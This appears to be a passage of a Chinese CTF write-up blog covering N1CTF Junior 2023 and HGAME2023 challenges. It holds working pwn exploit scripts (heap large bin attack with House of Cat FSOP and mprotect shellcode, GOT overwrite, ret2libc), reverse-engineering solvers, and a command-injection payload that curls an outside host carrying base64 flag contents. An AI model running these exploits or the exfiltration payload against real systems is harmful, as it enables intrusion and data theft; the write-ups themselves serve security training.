注意到8*v41是unsigned __int16类型,而我们申请的memSize为0-0x10000,也就是说只要指定memSize为0x10000,这个判断必定为false(即便memSize更小一些,这里也可能出现算术溢出,感觉memSize能设0x10000是题目降难度了)。这里的mem是_QWORD[]类型,为虚拟机内存。由此,我们可以控制下标v41为0-0xffff间的数,从而实现memmem+8*0xffff地址上的写。这个范围已经足够覆盖mem后面用户申请的堆块范围,即可以实现堆上任意写。到这里,利用思路就变得清晰起来:

unsorted bin泄露libc–large bin泄露堆地址–large bin attack覆盖_IO_list_all–FSOP

需要注意的是,为了读取free后的堆块数据,我们需要构造chunk overlap。因为有堆上任意写,我们可以通过覆盖size域轻易实现这一点。具体步骤如下:

  1. 申请大堆块chunk0
  2. 申请被攻击堆块chunk1
  3. 更改chunk0的size域使其正好包括chunk0和chunk1
  4. 申请两个大堆块chunk3和chunk4,大小正好填满chunk0和chunk1的范围,分割的位置是我们要读的位置
  5. 释放chunk1,通过chunk4即可读取chunk1的数据

然后只要写一段虚拟机的shellcode实现我们的攻击思路即可,FSOP我利用的链子是House of Cat,可以直接控制rdx转到setcontext的gadget,然后rop到mprotect使堆权限为RWX,然后ret2shellcode。比较麻烦的是,泄露的地址都在虚拟机里,没有输出出来,因此我们需要用虚拟机指令完成指令的计算、结构体的伪造等。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
from pwn import *
context(arch='amd64',os='linux')
p=process('./pwn')
libc=ELF('./libc.so.6')

codeSize=0x1000
memSize=0x10000

def malloc(idx, size):
return b'?'+p8(idx)+p16(size)
def free(idx):
return b'!'+p8(idx)
def writemem(idx, reg):
assert(0<=reg<=3)
assert(idx<=0xffff)
return b'['+p16(idx)+p8(reg)
def writeheap(idx, reg):
assert(0<=reg<=3)
idx=idx+memSize//8+1
return writemem(idx, reg)
def readmem(idx, reg):
assert(0<=reg<=3)
assert(idx<memSize>>3)
return b']'+p8(reg)+p16(idx)
def calc(op, dst, src1, src2):
assert(op in ['+','-','*','/','^','&','<','>'])
return op.encode()+p8(dst)+p8(src1)+p8(src2)
def writereg(reg, content):
assert(len(content)==8)
assert(0<=reg<=3)
return b'~'+p8(reg)+content
def clearreg(reg):
assert(0<=reg<=3)
return calc('^',reg,reg,reg)
def readheap(idx, reg, offset):
assert(0<=reg<=3)
assert(0<=idx<=6)
assert(offset==0 or offset==1)
return b'`'+p8(reg)+p8(idx)+p8(offset)
def writememblock(idx, content):
#uses reg3!!!
content=content.ljust((len(content)//8+(1 if len(content)%8 else 0))*8,b'\x00')
result=b''
for i in range(len(content)//8):
result+=writereg(3, content[i*8:i*8+8])
result+=writemem(idx+i, 3)
return result
def writeheapblock(idx, content):
return writememblock(idx+memSize//8+1, content)

p.sendlineafter(b'size of your code?\n',str(codeSize).encode())
p.sendlineafter(b'size of your memory?\n',str(memSize).encode())

sc='''
;leak libc
malloc(0,0x420)
malloc(6,0x10)
malloc(2,0x420)
malloc(6,0x10)
writereg(0,p64(0x430+0x430+0x20+1))
writeheap(0,0)
free(0)
malloc(0,0x420+0x20)
malloc(1,0x420)
free(2)
readheap(1,0,0)
writereg(1,p64(2202848))
calc('-',0,0,1)
writemem(0,0)
malloc(2,0x420)
'''
total_heap_size=0x430*2+0x20*2
sc+='''
;large bin attack && FSOP
malloc(5,0x420)
malloc(0,0x440)
malloc(6,0x10)
malloc(1,0x430)
malloc(6,0x10)
writereg(1, p64(0x430+0x450+1))
writeheap(total_heap_size//8,1)
free(5)
malloc(5,0x430)
malloc(5,0x430)

writereg(1, p64(0x451))
writeheap((total_heap_size+0x430)//8,1)
free(0)
malloc(6,0x450)
readheap(5,2,0)
free(1)
writereg(3, p64(0x470))
calc('+',2,2,3)
writemem(1,2)
writereg(1,p64(libc.sym['_IO_list_all']-0x20))
calc('+',3,0,1)
writeheap((total_heap_size+0x430+0x20)//8,3)
malloc(1,0x450)
'''
heap0idx=(total_heap_size+0x430+0x468)//8
gadget=0x53a6d
orw=b'\xb8flagPH\x89\xe71\xf61\xc0\x04\x02\x0f\x05\x89\xc7H\x89\xe6f\xb8\x01\x011\xd2f\x89\xc2f\x01\xc61\xc0\x0f\x051\xfff\xff\xc7f\xff\xc71\xc0\xfe\xc0\x0f\x05'
sc+='''
;House of Cat
writeheapblock(heap0idx,p64(0)*8+p64(1)+p64(2))
readmem(1,1)
writereg(2,p64((heap0idx+1)*8+0x10000))
calc('-', 1, 1, 2)
writemem(2, 1)
writeheap(heap0idx+10, 1)
writereg(2,p64(0x12b0))
calc('-', 1, 1, 2)
writemem(0x138//8, 1)
writereg(2,p64(gadget))
calc('+', 2, 0, 2)
writeheap(heap0idx+11, 2)
writeheapblock(heap0idx+12, p64(0)*5)
writereg(2, p64(0x500))
calc('+', 1, 1, 2)
writeheap(heap0idx+17, 1)
writeheapblock(heap0idx+18, p64(0)*2)
writereg(2, p64(0x30))
readmem(1, 1)
calc('+', 1, 1, 2)
writeheap(heap0idx+20, 1)
writeheapblock(heap0idx+21, p64(0)*3+p64(1)+p64(0)*2)
writereg(1, p64(0x2160c0+0x30))
calc('+', 1, 1, 0)
writeheap(heap0idx+27, 1)
writeheapblock(heap0idx+28, p64(0)*6)
readmem(1,1)
writereg(2, p64(0x40))
calc('+', 1, 1, 2)
writeheap(heap0idx+34, 1)

;set rop payload
readmem(2,1)
writereg(2, p64(0x138))
calc('+',1,1,2)
writemem(0xa0//8, 1)
writereg(2, p64(0x2a3e5))
calc('+',1,0,2)
writemem(0xa8//8, 1)
writemem(0x130//8, 1)
writereg(2, p64(0x2be51))
calc('+',1,0,2)
writemem(0x140//8, 1)
writereg(2, p64(0x20000))
writemem(0x148//8, 2)
writereg(2, p64(0x90529))
calc('+',1,0,2)
writemem(0x150//8, 1)
writememblock(0x158//8, p64(7)+p64(0))
writereg(2, p64(libc.sym['mprotect']))
calc('+',1,0,2)
writemem(0x168//8, 1)
readmem(2,1)
writereg(2,p64(0x200))
calc('+',1,1,2)
writemem(0x170//8, 1)
writememblock(0x200//8, orw)
'''

code=b''.join([eval(i) for i in sc.splitlines() if i and not i.startswith(';')])
p.sendafter(b'Show me the code:', code)
print(p.recvuntil(b'}'))
]]> N1CTF Junior 2023 Pwn Machine赛题复现 by 没有头猪 N1ctf Junior 2023 writeup https://zqy.ink/2023/02/03/N1ctf_Junior_2023_wp/ 2023-02-03T01:18:27.000Z 2025-11-14T08:20:36.879Z pwn

StudentManager

type confusion,size可为负数,从而实现任意地址写。先建一个name为/bin/sh的student,然后覆盖got表,puts改为system,最后show即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
#p=process('./StudentManager')
p=connect('39.102.55.191',9998)
elf=ELF('./StudentManager')
libc=ELF('./libc-2.31.so')
context.log_level='debug'
def add(name, size, content):
p.sendlineafter(b'>> ',b'1')
p.sendafter(b'Name: \n',name)
p.sendlineafter(b'Size: \n',str(size).encode())
p.sendafter(b'Description: \n',content)
def edit(idx, name, content):
p.sendlineafter(b'>> ',b'2')
p.sendlineafter(b'edit: \n',str(idx).encode())
p.sendafter(b'Name: \n',name)
p.sendafter(b'description: \n',content)
def show(idx):
p.sendlineafter(b'>> ',b'3')
p.sendlineafter(b'show: \n',str(idx).encode())
p.recvuntil(b'Name: \n')
add(b'a', 32, b'/bin/sh\x00')
edit(0,b'a'*16,b'/bin/sh\x00')
show(0)
p.recvuntil(b'a'*16)
pie_base=u64(p.recv(6)+b'\x00\x00')-17184
add(b'a', -0x340+0x18,b'a')
add(b'a', 32, b'\x20')
show(2)
p.recvuntil(b'Description: \n')
libc.address=u64(p.recv(6)+b'\x00\x00')-libc.sym['puts']
edit(2,b'a',p64(libc.sym['system']))
sleep(1)
p.sendline(b'3')
sleep(1)
p.sendline(b'0')
p.interactive()

gotclear

Partial RELRO,跟踪程序第一次调用库函数的过程,发现调用了0x401030开始的一些过程。因此ROP到这些函数即可重置got表为正确的地址。动调时发现似乎重置后会再调用一次对应的库函数(也有可能我没调对),因为此时参数多半不合法所以会导致puts, read等函数对应的syscall失败,但程序并不会崩溃,只要避免重置setbuf的got表即可。第一遍重置got表+泄露libc,返回到main函数中一个合适的地方,第二遍ret2libc即可。

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
#p=process('./main')
p=connect('39.102.55.191',9999)
elf=ELF('./main')
libc=ELF('./libc-2.31.so')
context.log_level='debug'
p.send(b'a'*0x38+p64(0x401030)+p64(0x401050)+p64(0x401293)+p64(0x404018)+p64(0x40115d)+p64(0x404100)+p64(0x4011c5))
libc.address=u64(p.recvuntil(b'\x7f')[-6:]+b'\x00\x00')-libc.sym['puts']
info(hex(libc.address))
binsh=next(libc.search(b'/bin/sh'))
p.send(b'a'*0x38+p64(0x40128c)+p64(0)*4+p64(libc.address+0xe3afe))
p.interactive()

reverse

junior_enc

题目给了具体的aes加密函数,写个对应的解密函数即可。程序中用unicorn跑了个arm架构shellcode,直接dump下来扔进IDA,两个异或+一个加减,明显可逆。注意程序中的hook,要patch一下dump下来code的两个字节。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
# _*_ coding:utf-8 _*_
import random
import time

s = [[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
     [0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
     [0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
     [0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
     [0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
     [0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
     [0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
     [0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
     [0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
     [0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
     [0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
     [0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
     [0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
     [0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
     [0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
     [0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]]

re_s = [[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
        [0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
        [0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
        [0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
        [0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
        [0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
        [0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
        [0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
        [0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
        [0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
        [0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
        [0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
        [0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
        [0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
        [0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
        [0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]]


def sub_bytes(input_matrix):
    output_matrix = [[0 for i in range(0, 4)] for _ in range(0, 4)]
    for i in range(0, 4):
        for j in range(0, 4):
            x = int(bin(input_matrix[i][j])[2:].zfill(8)[:4], 2)
            y = int(bin(input_matrix[i][j])[2:].zfill(8)[4:], 2)
            output_matrix[i][j] = re_s[x][y]
    return output_matrix


def T(vector, time):
    Rcon = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36]
    vec = [0, 0, 0, 0]
    for i in range(0, 4):
        vec[i] = vector[(i+1) % 4]

    for j in range(0, 4):
        x = int(bin(vec[j])[2:].zfill(8)[:4], 2)
        y = int(bin(vec[j])[2:].zfill(8)[4:], 2)
        vec[j] = s[x][y]
    vec[0] ^= Rcon[time-1]
    return vec


def key_extend(init_key):
    w = [[0 for m in range(0, 4)] for _ in range(0, 44)]
    for i in range(0, 4):
        for j in range(0, 4):
            w[i][j] = init_key[i*4 + j]
    time = 1
    for row in range(4, 44):
        if row % 4 != 0:
            for yuan in range(0, 4):
                w[row][yuan] = w[row-4][yuan] ^ w[row-1][yuan]
        else:
            t_w = T(w[row-1], time)
            time += 1
            for yuan in range(0, 4):
                w[row][yuan] = w[row-4][yuan] ^ t_w[yuan]
    return w


def row_move(input_matrix):
    output_matrix = [[0 for i in range(0, 4)] for _ in range(0, 4)]
    for i in range(0, 4):
        output_matrix[0][i] = input_matrix[0][(i+3) % 4]
    for i in range(0, 4):
        output_matrix[1][i] = input_matrix[1][(i+2) % 4]
    for i in range(0, 4):
        output_matrix[2][i] = input_matrix[2][(i+1) % 4]
    for i in range(0, 4):
        output_matrix[3][i] = input_matrix[3][i]
    return output_matrix


def GF_calculate(num1, num2):
    sum = 0
    num1 = bin(num1)[2:].zfill(8)
    num2 = bin(num2)[2:].zfill(8)
    table = [0b00000001, 0b00000010, 0b00000100, 0b00001000, 0b00010000, 0b00100000, 0b01000000, 0b10000000,
             0b11011, 0b110110, 0b1101100, 0b11011000, 0b10101101, 0b1000111, 0b10001110]

    for i in range(0, 8):
        for j in range(0, 8):
            if int(num1[i]) == 1 and int(num2[j]) == 1:
                index_value = (7-i) + (7-j)
                sum ^= table[index_value]
    return sum


def col_mix(input_matrix):
    col_m = [[2, 3, 1, 1], [1, 2, 3, 1], [1, 1, 2, 3], [3, 1, 1, 2]]
    im = input_matrix
    output_matrix = [[0 for i in range(0, 4)] for _ in range(0, 4)]
    for i in range(0, 4):
        for j in range(0, 4):
            output_matrix[i][j] = GF_calculate(col_m[i][0], im[0][j]) ^ GF_calculate(col_m[i][1], im[1][j]) ^\
                GF_calculate(col_m[i][2], im[2][j]) ^ GF_calculate(
                    col_m[i][3], im[3][j])
    return output_matrix

def m_to_matrix(m):
    m_matrix = [[0 for i in range(0, 4)] for i in range(0, 4)]
    num = 0
    for j in range(0, 4):
        for i in range(0, 4):
            m_matrix[i][j] = m[num]
            num += 1
    return m_matrix


def matrix_to_m(matrix):
    m = []
    for j in range(0, 4):
        for i in range(0, 4):
            m.append(matrix[i][j])
    return bytes(m)


def aes_encrypt(key, m):
    w = key_extend(key)
    m_matrix = m_to_matrix(m)
    for i in range(0, 4):
        for j in range(0, 4):
            m_matrix[i][j] ^= w[j][i]
    for loop_time in range(1, 10):
        m_matrix = sub_bytes(m_matrix)
        m_matrix = row_move(m_matrix)
        m_matrix = col_mix(m_matrix)
        for i in range(0, 4):
            for j in range(0, 4):
                m_matrix[i][j] ^= w[j+4*loop_time][i]
    m_matrix = sub_bytes(m_matrix)
    m_matrix = row_move(m_matrix)
    for i in range(0, 4):
        for j in range(0, 4):
            m_matrix[i][j] ^= w[j+4*10][i]
    return matrix_to_m(m_matrix)

def rev_sub_bytes(input_matrix):
    output_matrix = [[0 for i in range(0, 4)] for _ in range(0, 4)]
    for i in range(0, 4):
        for j in range(0, 4):
            x = int(bin(input_matrix[i][j])[2:].zfill(8)[:4], 2)
            y = int(bin(input_matrix[i][j])[2:].zfill(8)[4:], 2)
            output_matrix[i][j] = s[x][y]
    return output_matrix

def rev_col_mix(input_matrix):
    return col_mix(col_mix(col_mix(input_matrix)))
    
def rev_row_move(input_matrix):
    return row_move(row_move(row_move(input_matrix)))

def aes_decrypt(key, m):
    w = key_extend(key)
    m_matrix = m_to_matrix(m)
    for i in range(4):
        for j in range(4):
            m_matrix[i][j] ^= w[j+4*10][i]
    m_matrix = rev_row_move(m_matrix)
    m_matrix = rev_sub_bytes(m_matrix)
    for loop_time in range(9, 0, -1):
        for i in range(0, 4):
            for j in range(0, 4):
                m_matrix[i][j] ^= w[j+4*loop_time][i]
        m_matrix = rev_col_mix(m_matrix)
        m_matrix = rev_row_move(m_matrix)
        m_matrix = rev_sub_bytes(m_matrix)
    for i in range(0, 4):
        for j in range(0, 4):
            m_matrix[i][j] ^= w[j][i]
    return matrix_to_m(m_matrix)
     


def check_format(data):
    if data.startswith('secpunk{'):
        if data.endswith('}'):
            if len(data) == 41:
                print("Your flag format is correct!!! Continue to check your flag......")
            else:
                print("Sorry, Your flag doesn't have 41 characters")
                exit(0)
        else:
            print("Sorry, Your flag doesn't end with }")
            exit(0)
    else:
        print("Sorry, Your flag doesn't begin with secpunk{")
        exit(0)


if __name__ == '__main__':
    ret=[0]*32
    seed = 0xdeadbeef
    random.seed(seed)
    key = [random.randint(97, 122) for i in range(16)]
    cmp = [61, 182, 175, 175, 2, 168, 124, 177, 32, 240, 230, 220, 58, 123, 165, 238, 53, 192, 237, 21, 175, 91, 224, 150, 133, 153, 54, 203, 79, 33, 193, 172]
    ret[:16] = list(aes_decrypt(bytes(key), cmp[:16]))
    ret[16:] = list(aes_decrypt(bytes(key), cmp[16:]))
    for m in range(31,0,-1):
        ret[m] ^= ret[m-1]
    for m in range(0, 32, 2):
        ret[m],ret[m+1]=ret[m+1],ret[m]
    for m in range(32):
        if (m&1)!=0:
            ret[m]-=8
            assert(ret[m]>=0)
        else:
            ret[m]-=18
            assert(ret[m]>=0)
    
    for m in range(31,-1,-1):
        ret[m] ^= ret[(m+1)%32]
    for i in ret:
        print(chr(i),end='')

n0th1ngG0

赛中没看明白是哪个算法,赛后才知道是rc4。不过分析程序加密逻辑会发现就是个按字节异或,这里有个比较方便的办法,把程序最后用来比较的字节dump下来,再次运行程序,直接把加密后字节改到输入部分,跑一遍加密函数再看内存,就出了。也可以选择动调,把与之异或的key给dump下来,不过似乎那些字节不在连续的内存空间上,我直接下断点看寄存器把字节抄出来了。

1
2
3
4
enc=[0x51,0x23,0x48,0x73,0x13,0x50,0x2C,0x63,0x61,0xBA,0x60,0x2E,0x54,0x65,0x29,0x66,0x81,0xAB,0x87,0x34,0x1A,0xD0,0x71,0xAE,0xA7,0xE8,0xAC,0xCC,0xEC,0x75,0x56,0xFB,0x79,0x05]
xor=[0x22,0x46,0x2b,0x03,0x66,0x3e,0x47,0x18,0x2f,0x8b,0x3f,0x64,0x01,0x0b,0x18,0x56,0xf3,0xf4,0xb5,0x04,0x28,0xe3,0x2e,0x9f,0xd4,0xb7,0x98,0xbb,0xdf,0x06,0x66,0x96,0x4a,0x78]
for i in range(len(enc)):
    print(chr(enc[i]^xor[i]),end='')
]]> N1ctf Junior 2023 writeup by 没有头猪 HGAME2023 week3 writeup https://zqy.ink/2023/02/03/HGAME2023_wk3_wp/ 2023-02-03T00:53:42.000Z 2025-11-14T08:20:36.879Z web

Gopher Shop

条件竞争,用BurpSuite的TurboIntruder插件并发请求,先买苹果,然后卖出,使苹果数量下溢,再卖很多苹果就能拿到flag需要的钱了。

Ping To The Host

命令注入,似乎过滤了空格和cat,tac,flag等字符串,payload:

1
.&curl${IFS}test.zqy.ink/`nl${IFS}/fla*|base64`

reverse

kunmusic

.NET程序,用dnspy逆,发现把程序资源中的data异或后作为程序集加载了,那就提取异或后再用dnspy逆,发现一堆约束方程,直接z3求解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from Crypto.Util.number import *
'''
data=open('data','rb')
b=open('output','wb')
for i in data.read():
    b.write(long_to_bytes(i ^ 104))
b.close()
'''
from z3 import *
x=Solver()
num=[0]*13
for i in range(13):
    num[i]=BitVec(f'num[{i}]',16)
    x.add(num[i]>=0)
x.add(num[0] + 52296 + num[1] - 26211 + num[2] - 11754 + (num[3] ^ 41236) + num[4] * 63747 + num[5] - 52714 + num[6] - 10512 + num[7] * 12972 + num[8] + 45505 + num[9] - 21713 + num[10] - 59122 + num[11] - 12840 + (num[12] ^ 21087) == 12702282 , num[0] - 25228 + (num[1] ^ 20699) + (num[2] ^ 8158) + num[3] - 65307 + num[4] * 30701 + num[5] * 47555 + num[6] - 2557 + (num[7] ^ 49055) + num[8] - 7992 + (num[9] ^ 57465) + (num[10] ^ 57426) + num[11] + 13299 + num[12] - 50966 == 9946829 , num[0] - 64801 + num[1] - 60698 + num[2] - 40853 + num[3] - 54907 + num[4] + 29882 + (num[5] ^ 13574) + (num[6] ^ 21310) + num[7] + 47366 + num[8] + 41784 + (num[9] ^ 53690) + num[10] * 58436 + num[11] * 15590 + num[12] + 58225 == 2372055 , num[0] + 61538 + num[1] - 17121 + num[2] - 58124 + num[3] + 8186 + num[4] + 21253 + num[5] - 38524 + num[6] - 48323 + num[7] - 20556 + num[8] * 56056 + num[9] + 18568 + num[10] + 12995 + (num[11] ^ 39260) + num[12] + 25329 == 6732474 , num[0] - 42567 + num[1] - 17743 + num[2] * 47827 + num[3] - 10246 + (num[4] ^ 16284) + num[5] + 39390 + num[6] * 11803 + num[7] * 60332 + (num[8] ^ 18491) + (num[9] ^ 4795) + num[10] - 25636 + num[11] - 16780 + num[12] - 62345 == 14020739 , num[0] - 10968 + num[1] - 31780 + (num[2] ^ 31857) + num[3] - 61983 + num[4] * 31048 + num[5] * 20189 + num[6] + 12337 + num[7] * 25945 + (num[8] ^ 7064) + num[9] - 25369 + num[10] - 54893 + num[11] * 59949 + (num[12] ^ 12441) == 14434062 , num[0] + 16689 + num[1] - 10279 + num[2] - 32918 + num[3] - 57155 + num[4] * 26571 + num[5] * 15086 + (num[6] ^ 22986) + (num[7] ^ 23349) + (num[8] ^ 16381) + (num[9] ^ 23173) + num[10] - 40224 + num[11] + 31751 + num[12] * 8421 == 7433598 , num[0] + 28740 + num[1] - 64696 + num[2] + 60470 + num[3] - 14752 + (num[4] ^ 1287) + (num[5] ^ 35272) + num[6] + 49467 + num[7] - 33788 + num[8] + 20606 + (num[9] ^ 44874) + num[10] * 19764 + num[11] + 48342 + num[12] * 56511 == 7989404 , (num[0] ^ 28978) + num[1] + 23120 + num[2] + 22802 + num[3] * 31533 + (num[4] ^ 39287) + num[5] - 48576 + (num[6] ^ 28542) + num[7] - 43265 + num[8] + 22365 + num[9] + 61108 + num[10] * 2823 + num[11] - 30343 + num[12] + 14780 == 3504803 , num[0] * 22466 + (num[1] ^ 55999) + num[2] - 53658 + (num[3] ^ 47160) + (num[4] ^ 12511) + num[5] * 59807 + num[6] + 46242 + num[7] + 3052 + (num[8] ^ 25279) + num[9] + 30202 + num[10] * 22698 + num[11] + 33480 + (num[12] ^ 16757) == 11003580 , num[0] * 57492 + (num[1] ^ 13421) + num[2] - 13941 + (num[3] ^ 48092) + num[4] * 38310 + num[5] + 9884 + num[6] - 45500 + num[7] - 19233 + num[8] + 58274 + num[9] + 36175 + (num[10] ^ 18568) + num[11] * 49694 + (num[12] ^ 9473) == 25546210 , num[0] - 23355 + num[1] * 50164 + (num[2] ^ 34618) + num[3] + 52703 + num[4] + 36245 + num[5] * 46648 + (num[6] ^ 4858) + (num[7] ^ 41846) + num[8] * 27122 + (num[9] ^ 42058) + num[10] * 15676 + num[11] - 31863 + num[12] + 62510 == 11333836 , num[0] * 30523 + (num[1] ^ 7990) + num[2] + 39058 + num[3] * 57549 + (num[4] ^ 53440) + num[5] * 4275 + num[6] - 48863 + (num[7] ^ 55436) + (num[8] ^ 2624) + (num[9] ^ 13652) + num[10] + 62231 + num[11] + 19456 + num[12] - 13195 == 13863722)

num[1] = 72
num[7] = 53
num[11] = 93
num[5] = 86
num[10] = 15
num[9] = 199
num[12] = 133
num[4] = 189
num[0] = 236
num[6] = 62
num[3] = 106
num[8] = 120
num[2] = 213

arr=[132,47,180,7,216,45,68,6,39,246,124,2,243,137,58,172,53,200,99,91,83,13,171,80,108,235,179,58,176,28,216,36,11,80,39,162,97,58,236,130,123,176,24,212,56,89,72]
a=''
for i in range(len(arr)):
    a+=chr(arr[i]^num[i%len(num)])
print(a)

patchme

栈溢出漏洞+格式化字符串漏洞,patch如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
.text:00000000000013E9                               main proc near                          ; DATA XREF: start+21↑o
.text:00000000000013E9
.text:00000000000013E9                               var_30= qword ptr -30h
.text:00000000000013E9                               var_24= dword ptr -24h
.text:00000000000013E9                               s= byte ptr -20h
.text:00000000000013E9                               var_8= qword ptr -8
.text:00000000000013E9
.text:00000000000013E9                               ; __unwind {
.text:00000000000013E9 F3 0F 1E FA                   endbr64
.text:00000000000013ED 55                            push    rbp
.text:00000000000013EE 48 89 E5                      mov     rbp, rsp
